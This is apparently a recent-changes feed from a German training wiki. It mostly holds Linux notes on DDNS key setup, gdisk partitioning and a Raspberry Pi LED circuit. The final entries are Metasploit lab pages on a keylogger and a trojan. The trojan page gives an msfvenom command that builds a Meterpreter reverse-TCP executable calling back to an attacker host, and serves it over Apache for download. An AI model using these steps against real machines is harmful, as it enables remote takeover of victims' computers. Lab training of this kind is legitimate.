		<title>Ddns josh</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Ddns_josh&amp;diff=18495"/>
		<updated>2019-09-16T12:52:31Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: Die Seite wurde neu angelegt: „'''DDNS'''  um ein DDNS erstellen zu können muss zuerst ein Key erstellt werden dies geht mit   dnssec-keygen -a HMAC-MD5 -b 512 -n HOST example.com  Es wurde…“&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''DDNS'''&lt;br /&gt;
&lt;br /&gt;
um ein DDNS erstellen zu können muss zuerst ein Key erstellt werden dies geht mit&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a HMAC-MD5 -b 512 -n HOST example.com&lt;br /&gt;
&lt;br /&gt;
Es wurde die Datei Kexample.com.+xxx+xxxxx.private. erstellt&lt;br /&gt;
&lt;br /&gt;
 secret &amp;quot;&amp;quot;Private-key-format: v1.2&lt;br /&gt;
 Algorithm: 157 (HMAC_MD5)&lt;br /&gt;
 Key: testkey==&lt;br /&gt;
 Bits: AAA=&lt;br /&gt;
&lt;br /&gt;
in der neu erstellten Datei steht unter Key: der erstellt Key&lt;br /&gt;
dieser muss nach named.conf.local kopiert werden hinter secret&lt;br /&gt;
&lt;br /&gt;
 key example.com {&lt;br /&gt;
  algorithm HMAC-MD5;&lt;br /&gt;
  secret &amp;quot;testkey==&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Jezt wird noch in der named.conf der zonen eintrag geändert &lt;br /&gt;
  &lt;br /&gt;
 zone example.com {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;example.com&amp;quot;;&lt;br /&gt;
         allow-update {&lt;br /&gt;
         key example.com ;&lt;br /&gt;
        };&lt;br /&gt;
        };&lt;br /&gt;
zum schluss noch mit nsupdate updaten mit einem skript&lt;br /&gt;
&lt;br /&gt;
[[ddns basic]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18494</id>
		<title>To learn</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18494"/>
		<updated>2019-09-16T12:22:20Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;*[[To learn misc]]&lt;br /&gt;
*[[To learn linux]]&lt;br /&gt;
*[[To learn network]]&lt;br /&gt;
*[[To learn linux network]]&lt;br /&gt;
*[[To learn bash]]&lt;br /&gt;
*[[To learn linux packet managment]]&lt;br /&gt;
*[[To learn Server]]&lt;br /&gt;
*[[joshua]]&lt;br /&gt;
*[[to learn antworten]]&lt;br /&gt;
*[[gdisk josh]]&lt;br /&gt;
*[[ddns josh]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18493</id>
		<title>To learn</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18493"/>
		<updated>2019-09-16T12:22:03Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;*[[To learn misc]]&lt;br /&gt;
*[[To learn linux]]&lt;br /&gt;
*[[To learn network]]&lt;br /&gt;
*[[To learn linux network]]&lt;br /&gt;
*[[To learn bash]]&lt;br /&gt;
*[[To learn linux packet managment]]&lt;br /&gt;
*[[To learn Server]]&lt;br /&gt;
*[[joshua]]&lt;br /&gt;
*[[to learn antworten]]&lt;br /&gt;
*[[gdisk josh]]&lt;br /&gt;
*[ddns josh]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Raspberry_LED_GPIO_Pins&amp;diff=18475</id>
		<title>Raspberry LED GPIO Pins</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Raspberry_LED_GPIO_Pins&amp;diff=18475"/>
		<updated>2019-09-10T14:47:30Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: Die Seite wurde neu angelegt: „ == Einschalten einer LED mit den GPIO-Pins Ihres Raspberry Pi's.==  '''Das Breadboard''' Die Breadboard ist eine Möglichkeit, elektronische Komponenten mitei…“&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Einschalten einer LED mit den GPIO-Pins Ihres Raspberry Pi's.==&lt;br /&gt;
&lt;br /&gt;
'''Das Breadboard'''&lt;br /&gt;
Die Breadboard ist eine Möglichkeit, elektronische Komponenten miteinander zu verbinden, ohne sie zusammenlöten zu müssen&lt;br /&gt;
Die Löcher auf der Lochrasterplatine sind in einem Muster verbunden.&lt;br /&gt;
so sind alle Löscher in der ersten Reihe miteinander verbunden &lt;br /&gt;
ebenso sind auch in der zweiten Reihe die Löscher alle miteinander verbunden &lt;br /&gt;
die erste und die zweite Reihe sind jedoch nicht miteinander verbunden.&lt;br /&gt;
das gleiche gilt auch führ die beiden Reihen ganz unten &lt;br /&gt;
&lt;br /&gt;
zwischen den ersten und den letzten Rhein ist es anders dort sind alle Löcher in jeder Spalte miteinander verbunden.&lt;br /&gt;
&lt;br /&gt;
'''LED'''&lt;br /&gt;
Beim genaueren anschauen der LED`s wird auffallen das eine Seite länger ist als die andere.Der längere Draht auch bekannt als Anode ist immer mit der positiven Versorgung verbunden der kleiner Draht ist bekannt als Kathode sie ist mit der negativen Seite der Versorgung verbunden&lt;br /&gt;
&lt;br /&gt;
'''Der Widerstand'''&lt;br /&gt;
Widerstände sind eine Möglichkeit, die Menge an Strom, die durch einen Stromkreis fließt, zu begrenzen; insbesondere begrenzen sie die Menge an &amp;quot;Strom&amp;quot;, die fließen darf. Das Widerstandsmaß wird als Ohm bezeichnet (Ω), und je größer der Widerstand, desto mehr begrenzt er den Strom. Der Wert eines Widerstandes ist durch farbige Streifen entlang der Länge des Widerstandskörpers gekennzeichnet.&lt;br /&gt;
um unsere LED zum betreiben verwenden wir einen Wiederstand von 330 Ohm&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18466</id>
		<title>To learn</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18466"/>
		<updated>2019-09-10T08:47:11Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;*[[To learn misc]]&lt;br /&gt;
*[[To learn linux]]&lt;br /&gt;
*[[To learn network]]&lt;br /&gt;
*[[To learn linux network]]&lt;br /&gt;
*[[To learn bash]]&lt;br /&gt;
*[[To learn linux packet managment]]&lt;br /&gt;
*[[To learn Server]]&lt;br /&gt;
*[[joshua]]&lt;br /&gt;
*[[to learn antworten]]&lt;br /&gt;
*[[gdisk josh]]&lt;br /&gt;
*[[Raspberry LED GPIO Pins ]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18461</id>
		<title>To learn</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18461"/>
		<updated>2019-09-05T06:53:48Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;*[[To learn misc]]&lt;br /&gt;
*[[To learn linux]]&lt;br /&gt;
*[[To learn network]]&lt;br /&gt;
*[[To learn linux network]]&lt;br /&gt;
*[[To learn bash]]&lt;br /&gt;
*[[To learn linux packet managment]]&lt;br /&gt;
*[[To learn Server]]&lt;br /&gt;
*[[joshua]]&lt;br /&gt;
*[[to learn antworten]]&lt;br /&gt;
*[[gdisk josh]]&lt;br /&gt;
*[[LVM josh]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18455</id>
		<title>Gdisk josh</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18455"/>
		<updated>2019-09-04T10:54:58Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''Partitionstabellen und Partitionen auflisten'''&lt;br /&gt;
&lt;br /&gt;
 # gdisk -l /dev/sda &lt;br /&gt;
&lt;br /&gt;
'''Partitionstabelle sichern und wiederherstellen'''&lt;br /&gt;
&lt;br /&gt;
Bevor Änderungen an einer Festplatte gemacht werden sollten die Partitionstabelle  und das Partitionsschema des Laufwerks sichern.&lt;br /&gt;
Eine Sicherung kann auch verwendet werden um ein Patrtitionslayout auf mehrere Laufwerke zu kopieren.&lt;br /&gt;
Mit sgdisk kann eine Binärsicherung erstellt werden.&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -b=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Hier wird die Partitionstabelle /dev/sda als file sgdisk-sda.bin gesichert&lt;br /&gt;
&lt;br /&gt;
Das Backup kann Später wieder hergestellt werden mit:&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -l=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Wenn das Partitionslayout des aktuellen Gerätes auf ein anderes Laufwerk übernommen werden soll in diesem beispiel /dev/sda auf /dev/sdc geht dies mit&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -R=/dev/sdc /dev/sda&lt;br /&gt;
&lt;br /&gt;
'''Erstellen von Partitionstabellen und Partitionen'''&lt;br /&gt;
&lt;br /&gt;
Um gdisk zu verwenden wird der Befehl gdisk mit dem Namen des block device verwendet in diesem Beispiel /dev/sda.&lt;br /&gt;
&lt;br /&gt;
 # gdisk /dev/sda&lt;br /&gt;
&lt;br /&gt;
'''Das erstellen einer neuen Tabelle'''&lt;br /&gt;
wenn eine neue Partitionstabelle erstellt wird auf einer Festplatte auf der bereits Daten sind so werden diese gelöscht.&lt;br /&gt;
&lt;br /&gt;
Um eine neue GUID-Partitionstabelle zu erstellen muss in der Eingabeaufforderung ('''o''') eingegeben werden &lt;br /&gt;
&lt;br /&gt;
'''Erstellen einer neuen Partitionen''' &lt;br /&gt;
&lt;br /&gt;
um eine neue Partition zu erstellen drücken sie in der Eingabeaufforderung ('''n''')&lt;br /&gt;
es muss die Partitionsnummer der erste und der letzte Sektor so wie Partitionstyp&lt;br /&gt;
Die Partitionsnummer ist die Nummer die einer Partition zugeordnet ist zum Beispiel eine partition mit der Nummer 1 auf der Festplatte &lt;br /&gt;
wäre /dev/sda1 falls die Nummern nicht mit der Reihenfolge übereinstimmen können sie sortiert werden.&lt;br /&gt;
&lt;br /&gt;
'''Partitionstyp'''&lt;br /&gt;
&lt;br /&gt;
Der Partitionstyp wird ausgewählt indem der interne typcode von gdisk eingegeben wird (8300 ist das standardmäßige Linux filesystem) &lt;br /&gt;
mit ('''L''') wird die komplette liste der Codes angezeigt&lt;br /&gt;
&lt;br /&gt;
'''Änderungen auf die Festplatte schreiben'''&lt;br /&gt;
&lt;br /&gt;
Schreiben Sie die Tabelle auf die Festplatte und verlassen Sie sie über den Befehl w. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
gdisk hat die Möglichkeit, MBR- und BSD-Disklabels ohne Datenverlust in GPT zu konvertieren.Bei der Konvertierung werden alle primären MBR-Partitionen und die logischen Partitionen zu GPT-Partitionen.Nach der Konvertierung muss der Bootloader neu installiert werden, um ihn so zu konfigurieren, dass er von GPT bootet. &lt;br /&gt;
&lt;br /&gt;
Um eine MBR-Partitionstabelle mit der Hilfe von sgdisk in GPT zu konvertieren verwenden sie &lt;br /&gt;
 &lt;br /&gt;
 # sgdisk -g /dev/sda&lt;br /&gt;
&lt;br /&gt;
Um GPT in MBR zu konvertieren wird ('''-m''') genutzt.&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -m /dev/sda&lt;br /&gt;
&lt;br /&gt;
dabei ist zu beachten das nicht mehr als vier PArtitionen von GPT in MBR konvertiert werden können.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Partitionen sortieren'''&lt;br /&gt;
&lt;br /&gt;
Dies gilt für den Fall, dass eine neue Partition im Bereich zwischen zwei Partitionen erstellt oder eine Partition gelöscht wird. In diesem Beispiel wird /dev/sda verwendet. &lt;br /&gt;
&lt;br /&gt;
 # sgdisk -s /dev/sda&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Erweitern eines GPT-Laufwerks'''&lt;br /&gt;
&lt;br /&gt;
Nach dem Vergrößern einer Festplatte z.b. auf einer Virtuellen Maschine wird der neue Speicherplatz nicht sofort nutzbar sein da GPT die Daten am Ende der Festplatte hält. Der Backup-GPT-Header muss an das neue Ende der Festplatte verschoben werden  &lt;br /&gt;
&lt;br /&gt;
 # sgdisk -e /dev/sda&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''GPT-Header wiederherstellen'''&lt;br /&gt;
&lt;br /&gt;
Falls der Haupt-GPT-Header  beschädigt wird Können Sie mit gdik einen von dem anderen wiederherstellen &lt;br /&gt;
&lt;br /&gt;
 # gdisk /dev/sda&lt;br /&gt;
&lt;br /&gt;
Wählen Sie r für Wiederherstellungs- und Transformationsoptionen (nur für Experten). Wählen Sie dort entweder&lt;br /&gt;
&lt;br /&gt;
b: Backup-GPT-Header verwenden (Hauptteil neu aufbauen)&lt;br /&gt;
d: Verwendung des GPT-Hauptkopfes (Backup neu aufbauen)&lt;br /&gt;
wen dies getan ist kann die änderung mit w wieder auf die Tabelle geschrieben werden&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18454</id>
		<title>Gdisk josh</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18454"/>
		<updated>2019-09-04T09:39:54Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''Partitionstabellen und Partitionen auflisten'''&lt;br /&gt;
&lt;br /&gt;
 # gdisk -l /dev/sda &lt;br /&gt;
&lt;br /&gt;
'''Partitionstabelle sichern und wiederherstellen'''&lt;br /&gt;
&lt;br /&gt;
Bevor Änderungen an einer Festplatte gemacht werden sollten die Partitionstabelle  und das Partitionsschema des Laufwerks sichern.&lt;br /&gt;
Eine Sicherung kann auch verwendet werden um ein Patrtitionslayout auf mehrere Laufwerke zu kopieren.&lt;br /&gt;
Mit sgdisk kann eine Binärsicherung erstellt werden.&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -b=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Hier wird die Partitionstabelle /dev/sda als file sgdisk-sda.bin gesichert&lt;br /&gt;
&lt;br /&gt;
Das Backup kann Später wieder hergestellt werden mit:&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -l=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Wenn das Partitionslayout des aktuellen Gerätes auf ein anderes Laufwerk übernommen werden soll in diesem beispiel /dev/sda auf /dev/sdc geht dies mit&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -R=/dev/sdc /dev/sda&lt;br /&gt;
&lt;br /&gt;
'''Erstellen von Partitionstabellen und Partitionen'''&lt;br /&gt;
&lt;br /&gt;
Um gdisk zu verwenden wird der Befehl gdisk mit dem Namen des block device verwendet in diesem Beispiel /dev/sda.&lt;br /&gt;
&lt;br /&gt;
 # gdisk /dev/sda&lt;br /&gt;
&lt;br /&gt;
'''Das erstellen einer neuen Tabelle'''&lt;br /&gt;
wenn eine neue Partitionstabelle erstellt wird auf einer Festplatte auf der bereits Daten sind so werden diese gelöscht.&lt;br /&gt;
&lt;br /&gt;
Um eine neue GUID-Partitionstabelle zu erstellen muss in der Eingabeaufforderung ('''o''') eingegeben werden &lt;br /&gt;
&lt;br /&gt;
'''Erstellen einer neuen Partitionen''' &lt;br /&gt;
&lt;br /&gt;
um eine neue Partition zu erstellen drücken sie in der Eingabeaufforderung ('''n''')&lt;br /&gt;
es muss die Partitionsnummer der erste und der letzte Sektor so wie Partitionstyp&lt;br /&gt;
Die Partitionsnummer ist die Nummer die einer Partition zugeordnet ist zum Beispiel eine partition mit der Nummer 1 auf der Festplatte &lt;br /&gt;
wäre /dev/sda1 falls die Nummern nicht mit der Reihenfolge übereinstimmen können sie sortiert werden.&lt;br /&gt;
&lt;br /&gt;
'''Partitionstyp'''&lt;br /&gt;
&lt;br /&gt;
Der Partitionstyp wird ausgewählt indem der interne typcode von gdisk eingegeben wird (8300 ist das standardmäßige Linux filesystem) &lt;br /&gt;
mit ('''L''') wird die komplette liste der Codes angezeigt&lt;br /&gt;
&lt;br /&gt;
'''Änderungen auf die Festplatte schreiben'''&lt;br /&gt;
&lt;br /&gt;
Schreiben Sie die Tabelle auf die Festplatte und verlassen Sie sie über den Befehl w. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
gdisk hat die Möglichkeit, MBR- und BSD-Disklabels ohne Datenverlust in GPT zu konvertieren.Bei der Konvertierung werden alle primären MBR-Partitionen und die logischen Partitionen zu GPT-Partitionen.Nach der Konvertierung muss der Bootloader neu installiert werden, um ihn so zu konfigurieren, dass er von GPT bootet. &lt;br /&gt;
&lt;br /&gt;
Um eine MBR-Partitionstabelle mit der Hilfe von sgdisk in GPT zu konvertieren verwenden sie &lt;br /&gt;
 &lt;br /&gt;
# sgdisk -g /dev/sda&lt;br /&gt;
&lt;br /&gt;
Um GPT in MBR zu konvertieren wird ('''-m''') genutzt.&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -m /dev/sda&lt;br /&gt;
&lt;br /&gt;
dabei ist zu beachten das nicht mehr als vier PArtitionen von GPT in MBR konvertiert werden können.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Partitionen sortieren'''&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18453</id>
		<title>Gdisk josh</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18453"/>
		<updated>2019-09-04T09:24:16Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''Partitionstabellen und Partitionen auflisten'''&lt;br /&gt;
&lt;br /&gt;
 # gdisk -l /dev/sda &lt;br /&gt;
&lt;br /&gt;
'''Partitionstabelle sichern und wiederherstellen'''&lt;br /&gt;
&lt;br /&gt;
Bevor Änderungen an einer Festplatte gemacht werden sollten die Partitionstabelle  und das Partitionsschema des Laufwerks sichern.&lt;br /&gt;
Eine Sicherung kann auch verwendet werden um ein Patrtitionslayout auf mehrere Laufwerke zu kopieren.&lt;br /&gt;
Mit sgdisk kann eine Binärsicherung erstellt werden.&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -b=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Hier wird die Partitionstabelle /dev/sda als file sgdisk-sda.bin gesichert&lt;br /&gt;
&lt;br /&gt;
Das Backup kann Später wieder hergestellt werden mit:&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -l=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Wenn das Partitionslayout des aktuellen Gerätes auf ein anderes Laufwerk übernommen werden soll in diesem beispiel /dev/sda auf /dev/sdc geht dies mit&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -R=/dev/sdc /dev/sda&lt;br /&gt;
&lt;br /&gt;
'''Erstellen von Partitionstabellen und Partitionen'''&lt;br /&gt;
&lt;br /&gt;
Um gdisk zu verwenden wird der Befehl gdisk mit dem Namen des block device verwendet in diesem Beispiel /dev/sda.&lt;br /&gt;
&lt;br /&gt;
 # gdisk /dev/sda&lt;br /&gt;
&lt;br /&gt;
'''Das erstellen einer neuen Tabelle'''&lt;br /&gt;
wenn eine neue Partitionstabelle erstellt wird auf einer Festplatte auf der bereits Daten sind so werden diese gelöscht.&lt;br /&gt;
&lt;br /&gt;
Um eine neue GUID-Partitionstabelle zu erstellen muss in der Eingabeaufforderung ('''o''') eingegeben werden &lt;br /&gt;
&lt;br /&gt;
'''Erstellen einer neuen Partitionen''' &lt;br /&gt;
&lt;br /&gt;
um eine neue Partition zu erstellen drücken sie in der Eingabeaufforderung ('''n''')&lt;br /&gt;
es muss die Partitionsnummer der erste und der letzte Sektor so wie Partitionstyp&lt;br /&gt;
Die Partitionsnummer ist die Nummer die einer Partition zugeordnet ist zum Beispiel eine partition mit der Nummer 1 auf der Festplatte &lt;br /&gt;
wäre /dev/sda1 falls die Nummern nicht mit der Reihenfolge übereinstimmen können sie sortiert werden.&lt;br /&gt;
&lt;br /&gt;
'''Partitionstyp'''&lt;br /&gt;
&lt;br /&gt;
Der Partitionstyp wird ausgewählt indem der interne typcode von gdisk eingegeben wird (8300 ist das standardmäßige Linux filesystem) &lt;br /&gt;
mit ('''L''') wird die komplette liste der Codes angezeigt&lt;br /&gt;
&lt;br /&gt;
'''Änderungen auf die Festplatte schreiben'''&lt;br /&gt;
&lt;br /&gt;
Schreiben Sie die Tabelle auf die Festplatte und verlassen Sie sie über den Befehl w.&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18452</id>
		<title>Gdisk josh</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18452"/>
		<updated>2019-09-04T07:35:25Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''Partitionstabellen und Partitionen auflisten'''&lt;br /&gt;
&lt;br /&gt;
 # gdisk -l /dev/sda &lt;br /&gt;
&lt;br /&gt;
'''Partitionstabelle sichern und wiederherstellen'''&lt;br /&gt;
&lt;br /&gt;
Bevor Änderungen an einer Festplatte gemacht werden sollten die Partitionstabelle  und das Partitionsschema des Laufwerks sichern.&lt;br /&gt;
Eine Sicherung kann auch verwendet werden um ein Patrtitionslayout auf mehrere Laufwerke zu kopieren.&lt;br /&gt;
Mit sgdisk kann eine Binärsicherung erstellt werden.&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -b=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Hier wird die Partitionstabelle /dev/sda als file sgdisk-sda.bin gesichert&lt;br /&gt;
&lt;br /&gt;
Das Backup kann Später wieder hergestellt werden mit:&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -l=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Wenn das Partitionslayout des aktuellen Gerätes auf ein anderes Laufwerk übernommen werden soll in diesem beispiel /dev/sda auf /dev/sdc geht dies mit&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -R=/dev/sdc /dev/sda&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18451</id>
		<title>Gdisk josh</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Gdisk_josh&amp;diff=18451"/>
		<updated>2019-09-04T07:34:55Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: Die Seite wurde neu angelegt: „Partitionstabellen und Partitionen auflisten   # gdisk -l /dev/sda   Partitionstabelle sichern und wiederherstellen  Bevor Änderungen an einer Festplatte gema…“&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Partitionstabellen und Partitionen auflisten&lt;br /&gt;
&lt;br /&gt;
 # gdisk -l /dev/sda &lt;br /&gt;
&lt;br /&gt;
Partitionstabelle sichern und wiederherstellen&lt;br /&gt;
&lt;br /&gt;
Bevor Änderungen an einer Festplatte gemacht werden sollten die Partitionstabelle  und das Partitionsschema des Laufwerks sichern.&lt;br /&gt;
Eine Sicherung kann auch verwendet werden um ein Patrtitionslayout auf mehrere Laufwerke zu kopieren.&lt;br /&gt;
Mit sgdisk kann eine Binärsicherung erstellt werden.&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -b=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Hier wird die Partitionstabelle /dev/sda als file sgdisk-sda.bin gesichert&lt;br /&gt;
&lt;br /&gt;
Das Backup kann Später wieder hergestellt werden mit:&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -l=sgdisk-sda.bin /dev/sda&lt;br /&gt;
&lt;br /&gt;
Wenn das Partitionslayout des aktuellen Gerätes auf ein anderes Laufwerk übernommen werden soll in diesem beispiel /dev/sda auf /dev/sdc geht dies mit&lt;br /&gt;
&lt;br /&gt;
 # sgdisk -R=/dev/sdc /dev/sda&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18450</id>
		<title>To learn</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18450"/>
		<updated>2019-09-04T06:38:09Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;*[[To learn misc]]&lt;br /&gt;
*[[To learn linux]]&lt;br /&gt;
*[[To learn network]]&lt;br /&gt;
*[[To learn linux network]]&lt;br /&gt;
*[[To learn bash]]&lt;br /&gt;
*[[To learn linux packet managment]]&lt;br /&gt;
*[[To learn Server]]&lt;br /&gt;
*[[joshua]]&lt;br /&gt;
*[[to learn antworten]]&lt;br /&gt;
*[[gdisk josh]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18449</id>
		<title>To learn</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=To_learn&amp;diff=18449"/>
		<updated>2019-09-04T06:37:45Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;*[[To learn misc]]&lt;br /&gt;
*[[To learn linux]]&lt;br /&gt;
*[[To learn network]]&lt;br /&gt;
*[[To learn linux network]]&lt;br /&gt;
*[[To learn bash]]&lt;br /&gt;
*[[To learn linux packet managment]]&lt;br /&gt;
*[[To learn Server]]&lt;br /&gt;
*[[joshua]]&lt;br /&gt;
*[[to learn antworten]]&lt;br /&gt;
*[[gdisk]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_keylogger&amp;diff=18441</id>
		<title>Metasploit &amp; armitage keylogger</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_keylogger&amp;diff=18441"/>
		<updated>2019-09-02T10:57:25Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;start keylogger&lt;br /&gt;
&lt;br /&gt;
[[Datei:keyloger300.png]]&lt;br /&gt;
&lt;br /&gt;
on the left side we look live in the file in which we record&lt;br /&gt;
&lt;br /&gt;
on the right is the infected Windows machine&lt;br /&gt;
&lt;br /&gt;
[[Datei:400 keyloger.png]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18440</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18440"/>
		<updated>2019-09-02T10:55:26Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* What can you do */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup target&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST is the computer that the client will connect later ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
the target must be made to run the program we offer in this example simply the file as download to&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
